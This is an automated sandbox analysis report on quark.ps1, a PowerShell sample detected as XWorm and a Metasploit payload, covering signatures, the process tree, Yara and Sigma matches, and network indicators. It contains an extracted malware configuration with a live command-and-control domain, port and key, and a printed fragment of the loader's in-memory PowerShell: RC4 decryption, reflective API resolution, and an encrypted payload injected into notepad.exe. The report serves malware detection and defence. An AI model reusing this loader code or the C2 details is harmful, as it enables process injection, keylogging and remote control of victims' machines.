Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quark.ps1

Overview

General Information

Sample name:quark.ps1
Analysis ID:1429328
MD5:918d10fa6fd003a0bea73d2ba50538e0
SHA1:a089fbb17927d4a84d25e910b3d0cc7ea12faf1f
SHA256:4e842547867c928696600f51943bb9611adb9afc4741358fd5a97f28dcabfcf5
Tags:ps1
Infos:

Detection

Metasploit, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 6688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • notepad.exe (PID: 384 cmdline: C:\Windows\System32\notepad.exe MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["jdokds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6d5c:$cnc4: POST / HTTP/1.1
    00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x12f28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x1bd44:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x12fc5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x1bdfc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x130da:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x1bf2c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x12bd4:$cnc4: POST / HTTP/1.1
      00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x9aaf:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      • 0xc517:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Click to see the 2 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.notepad.exe.28858ef0000.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
        4.2.notepad.exe.28858ef0000.0.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x70b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x714d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7262:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x6d5c:$cnc4: POST / HTTP/1.1
        4.2.notepad.exe.28858ef0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          4.2.notepad.exe.28858ef0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x52b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x534d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x5462:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x4f5c:$cnc4: POST / HTTP/1.1
          4.2.notepad.exe.28858f7ce78.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_6688.amsi.csvJoeSecurity_MetasploitPayload_1Yara detected MetasploitPayloadJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", ProcessId: 6688, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1", ProcessId: 6688, ProcessName: powershell.exe

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["jdokds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Multi AV Scanner detection for domain / URL
              Source: jdokds.duckdns.orgVirustotal: Detection: 5%Perma Link
              Sample uses string decryption to hide its real strings
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpackString decryptor: jdokds.duckdns.org
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpackString decryptor: 8895
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpackString decryptor: <123456789>
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpackString decryptor: <Xwormmm>
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpackString decryptor: USB.exe

              Networking

              barindex
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: jdokds.duckdns.org
              Source: powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.2888967329.0000022400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: quark.ps1String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to log keystrokes (.Net Source)
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_000002885743AB034_2_000002885743AB03
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_000002885743AF234_2_000002885743AF23
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_0000028857439EDB4_2_0000028857439EDB
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_000002885743B7E34_2_000002885743B7E3
              Source: C:\Windows\System32\notepad.exeCode function: 4_2_000002885743B35B4_2_000002885743B35B
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.notepad.exe.28858ef0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.notepad.exe.28858f7ce78.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.2890687751.0000028858EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.2890793709.0000028858F71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: 00000004.00000002.2889960575.0000028857430000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 4.2.notepad.exe.28858f7ce78.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
              Source: C:\Windows\System32\notepad.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6464:120:WilError_03
              Source: C:\Windows\System32\notepad.exeMutant created: \Sessions\1\BaseNamedObjects\fR94ukDUyBXXff7e
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_igiqhzjc.zdy.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('o5n2vNkL79OCoYlfLSFN/IuQ283D4dAEXAStICCsUC5SANvTfAb39ousjEjEJkiy/SKPGXSKZvfiS5taCPT2I7EqQsX1fSmhXcJixqCDsu15NCSldawT+rF/3X5VypITgREh7IfUPQjssI/QaBwK+dfTkWXKOxG78vK7H+REbD6/4fmTTlYJ/tIJtns3RMddwlXp3C2CNom6qIjuW+EBO4pkoeMmXKnUesGnAZ47byXdRi3BSNgccd66BmWn0pWbJ8R7gQI/fgEIJwNehWP++2ExNjA1IvLwoe8HWpSrrilboUNz48UE+KNWAVS3sFImp0P8ImVNsU69aXhbHMv34oFmisCAUj0qh1v4MA+MP8aPD+x89zsvPFHEBJPPH+L0xmbcRQP/iP/6tqpPcZkJG0N9yUCIedU95D90EVy1HO4HFNWJVVo6Dft5gX5aW9BW9uKUTsv/iICmX0hpERACl/VVeE/uPD354eL3ZBhWW02aikpEXW/p55q7cp6OdrCuwi2uFmTRQTv7OH/Ej7AAROciidc/6L+5ZzDDuPyd8iGdzqsY18EAI+n267EuQOppcFkcfQWgmSnssJwLHLtE6fn63cGTpPwSZgafH8Nwc1tk0xsrqACvbFkS4IkbepT/mjX5YSs1kaFsFCxrztw6CFsS9V4dv3M2OkaBvw93O3C2cxKnRjJZjkEQSNfQcz6w6JW9pR103LUS2VgT8uflCLQnF5E4Ra9n9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\quark.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exeJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: quark.ps1Static file information: File size 13631488 > 1048576

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 4.2.notepad.exe.28858ef0000.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
